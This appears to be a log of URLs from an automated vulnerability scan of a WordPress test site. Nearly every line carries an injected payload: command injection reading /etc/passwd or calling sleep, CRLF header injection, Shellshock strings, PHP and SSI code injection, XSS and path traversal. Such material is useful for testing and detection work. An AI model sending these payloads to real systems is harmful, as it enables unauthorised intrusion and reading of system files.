/?p=any%0D%0ASet-cookie%3A+Tamper%3Da0602a9d-e54a-4053-9f0f-8cbe085ffc00%0D%0Ap=any%0D%0ASet-cookie%3A+Tamper%3Da0602a9d-e54a-4053-9f0f-8cbe085ffc00%0D%0A
/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3Ddef9f54b-a25e-40a0-89d5-b494dedb326dver=any%3F%0D%0ASet-cookie%3A+Tamper%3Ddef9f54b-a25e-40a0-89d5-b494dedb326d
/wp-content/plugins/user-registration/assets/js/frontend/lost-password.min.js?ver=any%3F%0ASet-cookie%3A+Tamper%3D00da6af0-69aa-4c82-b070-ffa4d96a6038ver=any%3F%0ASet-cookie%3A+Tamper%3D00da6af0-69aa-4c82-b070-ffa4d96a6038
/index.php/wp-json/oembed/1.0/embed?format=xml%0Asleep+15%0A&url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2Fformat=xml%0Asleep+15%0A&url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F
/wp-login.php?_wpnonce=7de0abcdc2&action=logout%7C%7Csleep+15_wpnonce=7de0abcdc2&action=logout%7C%7Csleep+15
/wp-login.php?reauth=1&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.phpreauth=1&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.php
/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=%22%3E%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E%3Cver=%22%3E%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E%3C
/index.php/page/2/?s=any%0D%0ASet-cookie%3A+Tamper%3Df66b22ab-be4d-428b-a49e-1474f9c1677es=any%0D%0ASet-cookie%3A+Tamper%3Df66b22ab-be4d-428b-a49e-1474f9c1677e
/index.php/my-account/lost-password/.svn/wc.db
/wp-includes/js/wp-backbone.min.js?ver=4.9.5%26sleep+15%26ver=4.9.5%26sleep+15%26
/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27ver=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27
/wp-includes/js/underscore.min.js?ver=1.8.3%60cat+%2Fetc%2Fpasswd%60ver=1.8.3%60cat+%2Fetc%2Fpasswd%60
/wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=any%0D%0ASet-cookie%3A+Tamper%3D7e9f3df6-f5bd-4cd1-8939-603a55e9c4fb%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3D7e9f3df6-f5bd-4cd1-8939-603a55e9c4fb%0D%0A
/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=any%0D%0ASet-cookie%3A+Tamper%3Db340e70e-f41b-405b-ba6b-91db2241eca0%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3Db340e70e-f41b-405b-ba6b-91db2241eca0%0D%0A
/wp-content/themes/twentyseventeen/assets/css/ie8.css?ver=1.0%22%3Bsleep+15%3B%22ver=1.0%22%3Bsleep+15%3B%22
/wp-includes/js/jquery/ui/sortable.min.js?ver=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5Cver=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C
/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.5ver=4.9.5
/wp-content/plugins/user-registration/assets/css/my-account-layout.css?ver=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27ver=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27
/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.5%26sleep%24mc+15%26ver=4.9.5%26sleep%24mc+15%26
/wp-login.php?action=%24%7B931787%2B969491%7Daction=%24%7B931787%2B969491%7D
/wp-includes/js/shortcode.min.js?ver=4.9.5%26%26cat+%2Fetc%2Fpasswdver=4.9.5%26%26cat+%2Fetc%2Fpasswd
/wp-content/themes/twentyseventeen/assets/js/navigation.js?ver=1.0ver=1.0
/wp-includes/css/admin-bar.min.css?ver=any%0D%0ASet-cookie%3A+Tamper%3D99922c4b-83a4-4513-8217-a83eef9ef2dc%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3D99922c4b-83a4-4513-8217-a83eef9ef2dc%0D%0A
/wp-login.php?action=lostpassword%7C%7Ccat+%2Fetc%2Fpasswdaction=lostpassword%7C%7Ccat+%2Fetc%2Fpasswd
/wp-includes/js/wp-embed.min.js?ver=etc%2Fpasswdver=etc%2Fpasswd
/index.php/my-account/edit-profile/post.php/?action=%22%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%22&post=%7B%7B+data.id+%7D%7Daction=%22%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%22&post=%7B%7B+data.id+%7D%7D
/index.php/my-account/user-logout/?_wpnonce=any%3F%0D%0ASet-cookie%3A+Tamper%3D19737e3a-f338-4c45-8c76-e78e4066b38b_wpnonce=any%3F%0D%0ASet-cookie%3A+Tamper%3D19737e3a-f338-4c45-8c76-e78e4066b38b
/index.php/page/3/?s=%24%7B947997%2B530156%7Ds=%24%7B947997%2B530156%7D
/wp-includes/js/backbone.min.js?ver=1.2.3%3Bcat+%2Fetc%2Fpasswd%3Bver=1.2.3%3Bcat+%2Fetc%2Fpasswd%3B
/wp-login.php?_wpnonce=7de0abcdc2%27%3Bcat+%2Fetc%2Fpasswd%3B%27&action=logout&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fregistration_wpnonce=7de0abcdc2%27%3Bcat+%2Fetc%2Fpasswd%3B%27&action=logout&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fregistration
/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1%26sleep%24mc+15%26ver=1.4.1%26sleep%24mc+15%26
/index.php/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F%3Bcat+%2Fetc%2Fpasswd%3Burl=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F%3Bcat+%2Fetc%2Fpasswd%3B
/wp-includes/js/wp-embed.min.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D147918e3-155b-49b4-8921-a003d059c658ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D147918e3-155b-49b4-8921-a003d059c658
/wp-includes/js/wp-backbone.min.js?ver=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3Ever=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
/wp-admin/load-styles.php?c=0&dir=any%0ASet-cookie%3A+Tamper%3D74694b0d-bd74-4cc4-a317-d79e5fb68646&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5c=0&dir=any%0ASet-cookie%3A+Tamper%3D74694b0d-bd74-4cc4-a317-d79e5fb68646&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5
/wp-includes/js/imgareaselect/imgareaselect.css?ver=0.9.8%27%3Bsleep+15%3B%27ver=0.9.8%27%3Bsleep+15%3B%27
/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4%7C%7Csleep+15ver=1.11.4%7C%7Csleep+15
/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27ver=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27
/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D563dec9f-f5e1-41d9-8af5-3e16d748c864ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D563dec9f-f5e1-41d9-8af5-3e16d748c864
/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.5%3Bsleep+15%3Bver=4.9.5%3Bsleep+15%3B
/wp-includes/js/backbone.min.js?ver=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27ver=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27
/wp-login.php?_wpnonce=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C&action=logout_wpnonce=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C&action=logout
/index.php/page/4/?s=%27%3Bcat+%2Fetc%2Fpasswd%3B%27s=%27%3Bcat+%2Fetc%2Fpasswd%3B%27
/wp-login.php?_wpnonce=7de0abcdc2&action=etc%2Fpasswd&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fregistration_wpnonce=7de0abcdc2&action=etc%2Fpasswd&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fregistration
/wp-includes/js/wp-embed.min.js?ver=any%3F%0ASet-cookie%3A+Tamper%3D147918e3-155b-49b4-8921-a003d059c658ver=any%3F%0ASet-cookie%3A+Tamper%3D147918e3-155b-49b4-8921-a003d059c658
/wp-includes/css/media-views.min.css?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D4b7c0bcd-051f-47ed-b36e-3af66403004bver=any%3F%0D%0ASet-cookie%3A+Tamper%3D4b7c0bcd-051f-47ed-b36e-3af66403004b
/wp-login.php?loggedout=any%0ASet-cookie%3A+Tamper%3D190581b9-cf96-42ef-a250-81a7c3d2168eloggedout=any%0ASet-cookie%3A+Tamper%3D190581b9-cf96-42ef-a250-81a7c3d2168e
/wp-includes/js/plupload/moxie.min.js?ver=1.3.5%26cat+%2Fetc%2Fpasswd%26ver=1.3.5%26cat+%2Fetc%2Fpasswd%26
/wp-includes/js/comment-reply.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3Da19ef0a0-9e8a-440b-a3f5-f3253ae2fec7%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3Da19ef0a0-9e8a-440b-a3f5-f3253ae2fec7%0D%0A
/wp-includes/js/jquery/ui/mouse.min.js?ver=%24%7B294769%2B334267%7Dver=%24%7B294769%2B334267%7D
/wp-login.php?_wpnonce=any%0ASet-cookie%3A+Tamper%3De0eb8f2e-eb39-48fc-aed5-393112b38643&action=logout&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fregistration_wpnonce=any%0ASet-cookie%3A+Tamper%3De0eb8f2e-eb39-48fc-aed5-393112b38643&action=logout&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fregistration
/index.php/wp-json/oembed/1.0/embed?url=any%3F%0D%0ASet-cookie%3A+Tamper%3D605d6c82-33c2-48a5-9cd6-83dc4d176b91url=any%3F%0D%0ASet-cookie%3A+Tamper%3D605d6c82-33c2-48a5-9cd6-83dc4d176b91
/wp-includes/js/jquery/ui/mouse.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3Dcbe31617-51f5-43e8-b1b2-7fcef7aeb54cver=any%0D%0ASet-cookie%3A+Tamper%3Dcbe31617-51f5-43e8-b1b2-7fcef7aeb54c
/wp-admin/load-styles.php?c=0&dir=%24%7B198472%2B362033%7D&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5c=0&dir=%24%7B198472%2B362033%7D&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5
/wp-content/plugins/user-registration/assets/css/user-registration-smallscreen.css?ver=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3Ever=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
/index.php/wp-json/oembed/1.0/embed?url=any%0D%0ASet-cookie%3A+Tamper%3D605d6c82-33c2-48a5-9cd6-83dc4d176b91url=any%0D%0ASet-cookie%3A+Tamper%3D605d6c82-33c2-48a5-9cd6-83dc4d176b91
/wp-includes/js/shortcode.min.js?ver=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswdver=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/index.php/my-account/lost-password/?reset-link-sent=%22%3E%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E%3Creset-link-sent=%22%3E%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E%3C
/index.php/my-account/user-logout/?_wpnonce=any%3F%0D%0ASet-cookie%3A+Tamper%3D19737e3a-f338-4c45-8c76-e78e4066b38b%0D%0A_wpnonce=any%3F%0D%0ASet-cookie%3A+Tamper%3D19737e3a-f338-4c45-8c76-e78e4066b38b%0D%0A
/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=any%3F%0ASet-cookie%3A+Tamper%3D44f1b16f-17cc-4c83-bddb-96521bc2043fver=any%3F%0ASet-cookie%3A+Tamper%3D44f1b16f-17cc-4c83-bddb-96521bc2043f
/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5%3Bcat+%2Fetc%2Fpasswd%3Bc=0&dir=ltr&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5%3Bcat+%2Fetc%2Fpasswd%3B
/index.php/wp-json/oembed/1.0/embed?format=any%3F%0D%0ASet-cookie%3A+Tamper%3D4e91df21-1d90-4141-9a88-0d6ab4a3673d&url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2Fformat=any%3F%0D%0ASet-cookie%3A+Tamper%3D4e91df21-1d90-4141-9a88-0d6ab4a3673d&url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F
/index.php/page/4/?s=%2Fetc%2Fpasswds=%2Fetc%2Fpasswd
/wp-content/themes/twentyseventeen/assets/js/global.js?ver=1.0%26sleep+15%26ver=1.0%26sleep+15%26
/wp-includes/js/jquery/ui/mouse.min.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3Dcbe31617-51f5-43e8-b1b2-7fcef7aeb54cver=any%3F%0D%0ASet-cookie%3A+Tamper%3Dcbe31617-51f5-43e8-b1b2-7fcef7aeb54c
/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5%27%3Bcat+%2Fetc%2Fpasswd%3B%27c=0&dir=ltr&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5%27%3Bcat+%2Fetc%2Fpasswd%3B%27
/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.5%22%3Bcat+%2Fetc%2Fpasswd%3B%22ver=4.9.5%22%3Bcat+%2Fetc%2Fpasswd%3B%22
/wp-content/plugins/user-registration/assets/js/jquery-tiptip/jquery.tipTip.min.js?ver=1.3.0%26%26sleep+15ver=1.3.0%26%26sleep+15
/wp-includes/js/wp-embed.min.js?ver=4.9.5%3Bsleep+15%3Bver=4.9.5%3Bsleep+15%3B
/wp-includes/js/media-audiovideo.min.js?ver=4.9.5%22%26sleep+15%26%22ver=4.9.5%22%26sleep+15%26%22
/wp-includes/js/media-audiovideo.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3De0405d10-2e55-4a46-8c9e-7e51f4a70639%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3De0405d10-2e55-4a46-8c9e-7e51f4a70639%0D%0A
/wp-login.php?loggedout=true%26%26sleep+15loggedout=true%26%26sleep+15
/wp-includes/js/api-request.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3Dea8a9ab6-57cd-46d2-abc7-6f195fc898f3%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3Dea8a9ab6-57cd-46d2-abc7-6f195fc898f3%0D%0A
/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2%22%26cat+%2Fetc%2Fpasswd%26%22ver=2.1.2%22%26cat+%2Fetc%2Fpasswd%26%22
/wp-content/plugins/user-registration/assets/js/inputmask/jquery.inputmask.bundle.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3Dcfdc1cde-0db8-44d7-bf34-e8384c0b446d%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3Dcfdc1cde-0db8-44d7-bf34-e8384c0b446d%0D%0A
/index.php/my-account/user-logout/?_wpnonce=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C_wpnonce=%24%7B%40print%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%7D%5C
/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.5%3Bcat+%2Fetc%2Fpasswd%3Bver=4.9.5%3Bcat+%2Fetc%2Fpasswd%3B
/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.5%26cat+%2Fetc%2Fpasswd%26ver=4.9.5%26cat+%2Fetc%2Fpasswd%26
/wp-includes/js/shortcode.min.js?ver=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27ver=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27
/index.php/my-account/edit-profile/post.php/?action=edit&post=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27action=edit&post=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27
/wp-content/plugins/user-registration/assets/js/jquery-tiptip/jquery.tipTip.min.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D74cb6e5a-d222-48a2-9384-98e06344d61fver=any%3F%0D%0ASet-cookie%3A+Tamper%3D74cb6e5a-d222-48a2-9384-98e06344d61f
/wp-includes/css/media-views.min.css?ver=4.9.5%22%3Bsleep+15%3B%22ver=4.9.5%22%3Bsleep+15%3B%22
/wp-includes/css/admin-bar.min.css?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D99922c4b-83a4-4513-8217-a83eef9ef2dc%0D%0Aver=any%3F%0D%0ASet-cookie%3A+Tamper%3D99922c4b-83a4-4513-8217-a83eef9ef2dc%0D%0A
/wp-content/plugins/user-registration/assets/js/jquery-tiptip/jquery.tipTip.min.js?ver=any%0ASet-cookie%3A+Tamper%3D74cb6e5a-d222-48a2-9384-98e06344d61fver=any%0ASet-cookie%3A+Tamper%3D74cb6e5a-d222-48a2-9384-98e06344d61f
/wp-login.php?_wpnonce=7de0abcdc2&action=logout&redirect_to=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27_wpnonce=7de0abcdc2&action=logout&redirect_to=%28%29+%7B+%3A%3B%7D%3B+echo+%27X-Powered-By%3A+ShellShock-Vulnerable%27
/wp-includes/js/admin-bar.min.js?ver=4.9.5%7Csleep+15%23ver=4.9.5%7Csleep+15%23
/wp-includes/js/wp-util.min.js?ver=4.9.5ver=4.9.5
/wp-login.php?action=lostpassword%22%26sleep+15%26%22action=lostpassword%22%26sleep+15%26%22
/index.php/my-account/edit-profile/post.php/?action=edit&post=any%3F%0D%0ASet-cookie%3A+Tamper%3D4b7be9c2-89df-42dc-90c1-50f0b0e5a341%0D%0Aaction=edit&post=any%3F%0D%0ASet-cookie%3A+Tamper%3D4b7be9c2-89df-42dc-90c1-50f0b0e5a341%0D%0A
/wp-login.php?_wpnonce=7de0abcdc2%22%26sleep+15%26%22&action=logout_wpnonce=7de0abcdc2%22%26sleep+15%26%22&action=logout
/index.php/wp-json/oembed/1.0/embed?format=xml&url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F%27%26sleep+15%26%27format=xml&url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F%27%26sleep+15%26%27
/wp-login.php?reauth=1&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.php%22%26sleep+15%26%22reauth=1&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.php%22%26sleep+15%26%22
/index.php/my-account/user-logout/?_wpnonce=any%0D%0ASet-cookie%3A+Tamper%3D19737e3a-f338-4c45-8c76-e78e4066b38b%0D%0A_wpnonce=any%0D%0ASet-cookie%3A+Tamper%3D19737e3a-f338-4c45-8c76-e78e4066b38b%0D%0A
/wp-content/plugins/user-registration/assets/js/frontend/jquery.validate.min.js?ver=1.15.1%7Csleep+15%23ver=1.15.1%7Csleep+15%23
/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3Db340e70e-f41b-405b-ba6b-91db2241eca0ver=any%3F%0D%0ASet-cookie%3A+Tamper%3Db340e70e-f41b-405b-ba6b-91db2241eca0
/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5%22%26cat+%2Fetc%2Fpasswd%26%22c=0&dir=ltr&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5%22%26cat+%2Fetc%2Fpasswd%26%22
/wp-content/plugins/user-registration/assets/css/user-registration.css?ver=any%0ASet-cookie%3A+Tamper%3D7290203c-b59d-4123-be1c-21335ffa0ba4ver=any%0ASet-cookie%3A+Tamper%3D7290203c-b59d-4123-be1c-21335ffa0ba4
/wp-content/plugins/user-registration/assets/js/frontend/my-account.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3Dae141467-ab17-4349-8101-33296424e82f%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3Dae141467-ab17-4349-8101-33296424e82f%0D%0A
/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27ver=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27
/?p=any%3F%0ASet-cookie%3A+Tamper%3Da0602a9d-e54a-4053-9f0f-8cbe085ffc00p=any%3F%0ASet-cookie%3A+Tamper%3Da0602a9d-e54a-4053-9f0f-8cbe085ffc00
/wp-includes/js/jquery/ui/mouse.min.js?ver=any%3F%0ASet-cookie%3A+Tamper%3Dcbe31617-51f5-43e8-b1b2-7fcef7aeb54cver=any%3F%0ASet-cookie%3A+Tamper%3Dcbe31617-51f5-43e8-b1b2-7fcef7aeb54c
/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B%20data.id%20%7D%7Daction=edit&post=%7B%7B%20data.id%20%7D%7D
/wp-includes/css/admin-bar.min.css?ver=etc%2Fpasswdver=etc%2Fpasswd
/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=any%0ASet-cookie%3A+Tamper%3D74694b0d-bd74-4cc4-a317-d79e5fb68646&ver=4.9.5c=0&dir=ltr&load%5B%5D=any%0ASet-cookie%3A+Tamper%3D74694b0d-bd74-4cc4-a317-d79e5fb68646&ver=4.9.5
/wp-admin/load-styles.php?c=0&dir=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5c=0&dir=%27%3Bprint%28chr%28122%29.chr%2897%29.chr%28112%29.chr%2895%29.chr%28116%29.chr%28111%29.chr%28107%29.chr%28101%29.chr%28110%29%29%3B%24var%3D%27&load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&ver=4.9.5
/wp-content/plugins/user-registration/assets/js/frontend/my-account.min.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3Dae141467-ab17-4349-8101-33296424e82fver=any%3F%0D%0ASet-cookie%3A+Tamper%3Dae141467-ab17-4349-8101-33296424e82f
/wp-includes/js/api-request.min.js?ver=any%3F%0ASet-cookie%3A+Tamper%3Dea8a9ab6-57cd-46d2-abc7-6f195fc898f3ver=any%3F%0ASet-cookie%3A+Tamper%3Dea8a9ab6-57cd-46d2-abc7-6f195fc898f3
/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4%26sleep+15%26ver=1.11.4%26sleep+15%26
/wp-includes/js/underscore.min.js?ver=any%0ASet-cookie%3A+Tamper%3Dfd29968a-70f9-49c4-8114-6e576e9c0d89ver=any%0ASet-cookie%3A+Tamper%3Dfd29968a-70f9-49c4-8114-6e576e9c0d89
/wp-content/plugins/user-registration/assets/js/frontend/user-registration.min.js?ver=any%0D%0ASet-cookie%3A+Tamper%3De8a20a2d-3667-4bb0-911f-1138a2e5f5ab%0D%0Aver=any%0D%0ASet-cookie%3A+Tamper%3De8a20a2d-3667-4bb0-911f-1138a2e5f5ab%0D%0A
/wp-includes/js/wp-util.min.js?ver=any%3F%0D%0ASet-cookie%3A+Tamper%3D8b3185e3-58e4-49e8-a4c7-058456baeeecver=any%3F%0D%0ASet-cookie%3A+Tamper%3D8b3185e3-58e4-49e8-a4c7-058456baeeec
/wp-includes/js/backbone.min.js?ver=1.2.3%27%26cat+%2Fetc%2Fpasswd%26%27ver=1.2.3%27%26cat+%2Fetc%2Fpasswd%26%27
/wp-login.php?reauth=1&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.php%26cat+%2Fetc%2Fpasswd%26reauth=1&redirect_to=http%3A%2F%2Ftest-site.com%2Fblog%2Fwp-admin%2Fprofile.php%26cat+%2Fetc%2Fpasswd%26
/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.5%27%3Bsleep+15%3B%27ver=4.9.5%27%3Bsleep+15%3B%27
/wp-includes/js/jquery/ui/sortable.min.js?ver=any%3F%0ASet-cookie%3A+Tamper%3Da15a7bce-2495-44f6-b858-061feea8bff5ver=any%3F%0ASet-cookie%3A+Tamper%3Da15a7bce-2495-44f6-b858-061feea8bff5
/wp-content/plugins/user-registration/assets/js/frontend/user-registration.min.js?ver=any%0ASet-cookie%3A+Tamper%3De8a20a2d-3667-4bb0-911f-1138a2e5f5abver=any%0ASet-cookie%3A+Tamper%3De8a20a2d-3667-4bb0-911f-1138a2e5f5ab
